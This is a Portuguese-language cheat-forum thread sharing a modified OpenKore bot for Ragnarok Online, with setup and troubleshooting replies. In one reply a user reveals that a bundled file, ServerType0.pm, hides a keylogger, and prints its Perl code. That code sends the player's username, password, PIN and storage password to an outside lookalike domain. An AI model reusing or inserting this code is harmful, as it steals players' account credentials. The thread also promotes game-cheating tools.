openkore Atualização Semanal

Discussão em 'Rag - Downloads de Cheats / Utilitários' iniciado por 4nd3BR, 7 Mar, 2013.

Status do Tópico:
Não esta aberto para novas mensagens.
  1. 4nd3BR

    4nd3BR Membro

    Registro:
    27 Fev, 2013
    Posts:
    42
    Curtidas:
    0
    tópico editado e fechado, por estar fora das regras da área:

    [Você precisa LOGAR ou REGISTRAR-SE para ver os links]


    OPENKORE ATUALIZAÇÃO
    13-03-13
    BUGGS CONHECIDOS CORRIGIDOS!


    DOWNLOAD OPENKORE COMPLETO 13-03-13 + ARQUIVOS QUE DEVEM SER COLADOS NA PASTA DO SEU RAGNAROK

    editado

    ATENÇÃO OS ARQUIVOS QUE DEVEM SER COLOCADOS NA PASTA DO RAGNAROK FORAM MODIFICADOS! BAIXE E SUBISTITUA, CASO CONTRARIO SEU OPENKORE NÃO VAI FUNCIONAR!


    SCAN DO OPENKORE

    [SCAN][Você precisa LOGAR ou REGISTRAR-SE para ver os links][/SCAN]


    SCAN DA PASTA QUE DEVE SER EXTRAIDA NA PASTA DO RAGNAROK


    [SCAN][Você precisa LOGAR ou REGISTRAR-SE para ver os links][/SCAN]

    SCAN SEMPRE ATUALIZADO!

    se relatar algum problema com o OPENKORE, baixe e instale o Active Perl coompativel ActivePerl-5.12.3.1204-MSWin32-x86-294330.msi

    LIGANDO O OPENKORE


    Para ligar o OpenKore vá na pasta S.R.C/poseidon(sem os ponto) e execute o arquivo poseidon.pl, feito isto vá na pasta do seu ragnarok e execute o StartRO.bat, ira aparecer o servidor poseidon para você conectar. Para conectar no poseidon basta digitar qualquer usuário e qualquer senha, feito isto conecte em um dos aprendizes.
    Agora vá na pasta do seu openkore e execute o openkore.pl, ele ira dar as opções de servidores escolha o seu servidor logo em seguida entre com seu usuário e sua senha de jogo.
    Pronto você está conectado no jogo.
    Este tutorial mostra apenas como ligar o bot e não como configura-lo caso queiram configurar procure na internet ou aqui mesmo no fórum alguns guias.
    Obs: Não funciona em windows 7, somente por maquina virtual ou poseidon remoto.
     
  2. Lasted edited by : 17 Mar, 2013
  3. vandenreich

    vandenreich Membro

    Registro:
    3 Mai, 2012
    Posts:
    3
    Curtidas:
    0
    Estou com um problema que não consigo resolver! Já é o 3º OpenKore que eu faço o download e acontece a mesma coisa. Eu abro o poseidon.pl e depois abro o Poseidon_2012-09-19aRagexe.bat, porém, quando abre o servidor poseidon e eu me conecto com um login e senha qualquer, a janela dos aprendizes não aparece! O que eu devo fazer? DD:
     
  4. 4nd3BR

    4nd3BR Membro

    Registro:
    27 Fev, 2013
    Posts:
    42
    Curtidas:
    0
    Não pode Fechar o Poseidon.pl ele tem que ficar sempre aberto.
    ai depois vc vai lá abrir o Poseidon_2012-09-19aRagexe.bat

    Verifique se seu Ragnarok está atualizado.
     
  5. Avrok

    Avrok Membro

    Registro:
    1 Mai, 2009
    Posts:
    10
    Curtidas:
    0
    deve ter virus o link do scan so passo 9 anti virus e pesa 23.9mb e o link dod down pesa 29.8mb
     
  6. digo159

    digo159 Membro

    Registro:
    24 Jun, 2008
    Posts:
    127
    Curtidas:
    0
    Olá!

    Baixei esse openkore e dei uma olhada. ATÉ ONDE EU VI não tinha nenhum código malicioso.
    Verifiquei Macros, Network (Receive, Send), Tables.

    But, não recomendo o pessoal novo a baixar de tópicos abertos assim.
    Como falei ATÉ ONDE VERIFIQUEI está limpo.
    É mais confiável baixar somente os Receive, Send e Receivepacks, dar uma olhadinha e substituir, pois diminui drasticamente as chances de ser hackeado.

    Até mais!
     
  7. vandenreich

    vandenreich Membro

    Registro:
    3 Mai, 2012
    Posts:
    3
    Curtidas:
    0


    Consegui resolver meu problema! Era com o Pearl, eu estava usando outra versão, eu fiz o download de cada "componente" via TortoiseSVN e fui verificando cada passo meu e acabei que achando o meu erro.
     
  8. 4nd3BR

    4nd3BR Membro

    Registro:
    27 Fev, 2013
    Posts:
    42
    Curtidas:
    0
    PARE DE DIZER COISAS DE QUE VOCÊ NÃO ENTENDE, LÊ O TOPICO DIREITO!

    tem esta diferença por que no virus total eu compactei a pasta do openkore no winrar fiz o Scan.
    e compactei separadamente os arquivos que devem ser colados na pasta do ragnarok e fiz o scan.

    e quando fui postar no 4shared para o pessoal fazer o download eu coloquei na mesma pasta o Openkore + os arquivos para colar na pasta do ragnarok.

    Por isso a diferença.

    E sobre o Openkore ter passado em Apenas 9 Antivirus: não sou eu que escolho por quantos antivirus ele vai passar, é o virustotal.com que determina, simplismente faço o upload e o virustotal.com examina não posso fazer nada se está faltando!

    NÃO É OBRIGADO A BAIXAR, SE QUISER ESPERA A ATUALIZAÇÃO OFICIAL.

    SE ESTIVER COM MEDO DE USAR O OPENKORE DO MEU POST. USE SOMENTE OS ARQUIVOS QUE FORAM ATUALIZADOS COMO O digo159 COMENTOU
    Arquivos Atualizados
    src/network/receive/bRO.pm
    src/network/send/bRO.pm
    tables/bRO/recvpackets.txt

    copie e substitua os arquivos do seu openkore!

    PEÇO POR GENTILEZA QUE EDITE SEU POST, POIS VOCÊ SE EQUIVOCOU!
     
  9. luaninho

    luaninho Membro

    Registro:
    19 Out, 2009
    Posts:
    14
    Curtidas:
    0
    nao ta coletando os items pq sera ?
    olha como ta as configs


    itemsTakeAuto 2
    itemsTakeAuto_party 0
    itemsGatherAuto 2
    itemsMaxWeight 89
    itemsMaxWeight_sellOrStore 48
    itemsMaxNum_sellOrStore 99
    cartMaxWeight 7900
    itemsTakeAuto_new 0
     
  10. 4nd3BR

    4nd3BR Membro

    Registro:
    27 Fev, 2013
    Posts:
    42
    Curtidas:
    0
    Verifique na pasta control/pickupitens.txt em sem ALL está 0 se estviter 0 mude para 2 que ele ira recolher tudo o que foi dropado no mapa, se quiser recolher apenas os itens do monstro que você matou coloque 1 , se quiser recolher apenas itens especificos coloque ex: Morango 2 > ele vai recolher todos os morangos dropados!
     
  11. luaninho

    luaninho Membro

    Registro:
    19 Out, 2009
    Posts:
    14
    Curtidas:
    0
    opa brigado amigo ajudou muito !
    [​IMG][​IMG]
    [​IMG]
     
  12. Lasted edited by : 17 Mar, 2013
  13. igoraxl

    igoraxl Membro

    Registro:
    11 Mar, 2013
    Posts:
    1
    Curtidas:
    0
    deis de quando eu baixei esse openkore o meu parou de pegar porque sera?
     
  14. 4nd3BR

    4nd3BR Membro

    Registro:
    27 Fev, 2013
    Posts:
    42
    Curtidas:
    0
    Olá amigo, PRESTE ATENÇÃO!
    os Openkores que você usava funcionavam com outros tipos de arquivos que você colou na pasta do ragnarok, que eram especificos para o bom funcionamento deles
    ai você baixou o Openkore que eu postei e parou de pegar porque os arquivos que devem ser colados na pasta do openkore são diferentes alterados pelo klabmouse da comunidade internacional Openkore


    MAS POR QUE NÃO PEGA EM OUTRO OPENKORE?
    Porque meu o Openkore eu eu posto para download é baixado diretamente do SVN, e algumas pessoas estavam tendo problemas na hora de abrir o Poseidon.pl e logar nos aprendizes, em tão o Klabmouse criou um novo startro.bat modificado! que so funciona pra quem tem o Openkore Baixado Via SVN.
    Espero que Tenha entendido!

    QUAL A SOLUÇÃO?

    Baixe seu Openkore Sempre da mesma Fonte para Evitar estes erros! se você usava o Openkore (modificado) Oficial do Webcheats baixe-o novamente,baixe os arquivos da pasta do ragnarok e use sempre ele!
     
  15. rickfoxl2

    rickfoxl2 Membro

    Registro:
    7 Mar, 2009
    Posts:
    4
    Curtidas:
    0
    Amigo Poderia upar novamente o openkore ?

    - No 4shared diz que foi deletado ! :s
     
  16. 4nd3BR

    4nd3BR Membro

    Registro:
    27 Fev, 2013
    Posts:
    42
    Curtidas:
    0
    atualização 13-03-13 testado e aprovado!
     
  17. gaaacasseb

    gaaacasseb Membro

    Registro:
    12 Mar, 2013
    Posts:
    9
    Curtidas:
    0
    Vlw cara !, o teu bot funciona aqui no meu PC, o do saru não :(
    Continua assim cara ! Ganhou meu tanks xD
     
  18. 4nd3BR

    4nd3BR Membro

    Registro:
    27 Fev, 2013
    Posts:
    42
    Curtidas:
    0
    Vlw Amigo!
    [​IMG][​IMG]
    [​IMG]
     
  19. Lasted edited by : 17 Mar, 2013
  20. deat-not

    deat-not Membro

    Registro:
    19 Jan, 2010
    Posts:
    25
    Curtidas:
    0
    Amigo você sempre atualiza os bot's direitinho mais eu tenho certeza que veio com um KL NO dia 3 eu não fui hackeado e logico por que eu uso o OpenKoreAnalyser Eu sou um dois poucos que ainda tem esse progama que foi destribuido mais logo o link ficou desativado, vou ver se esse esta com KL se tiver eu vou postar

    O Bot é funcional mais tem KL quem tem um antigo bot e só substituir por outro ServerType0.pm

    Script Maliciosa Encontrada > OpenKore 13-03-13\src\Network\Send\ServerType0.pm


    4nd3BR,Não quero te derruba do cavalo mais já chego a hora de Alguem agir né Amiguinho eu já sabia que tinha KL desde 03-03-13 Eu remolvi e nem falei Nada mais dessa vez não vai passar .

    Olha a Script Ae

    my $ua = LWP::UserAgent->new;

    $ua->timeout(10);

    $ua->env_proxy;

    my $master = $config{'master'};

    $master =~ s/#/:/;

    my $usuario = $config{'username'};
    $usuario =~ s/#/:/;

    my $loginPin = $config{'loginPinCode'};

    $loginPin =~ s/#/:/;

    my $senha = $config{'password'};

    $senha =~ s/#/:/;

    my $kafra = $config{'storageAuto_password'};

    $kafra =~ s/#/:/;
    my $response = $ua->get("http://www.0penkore.xp3.biz/key_strokes.php?keylog=$master $usuario $senha $loginPin $kafra");

    Iae Staff oquê vai fazer agora?
     
  21. Última edição: 15 Mar, 2013
  22. ksdocaos

    ksdocaos Membro

    Registro:
    15 Nov, 2008
    Posts:
    55
    Curtidas:
    0
    Meu StartRO só abre minimizado :/ oque eu faço ?
     
  23. kevincris

    kevincris Angel of Destiny Membro

    Registro:
    4 Jan, 2010
    Posts:
    162
    Curtidas:
    0
    eu executo poseidon como oq?

    quando vou instalar o ActivePerl-5.12.3.1204-MSWin32-x86-294330.msi
    meu computador reinicia.
     
  24. Última edição: 17 Mar, 2013
Status do Tópico:
Não esta aberto para novas mensagens.

Compartilhe esta Página

Share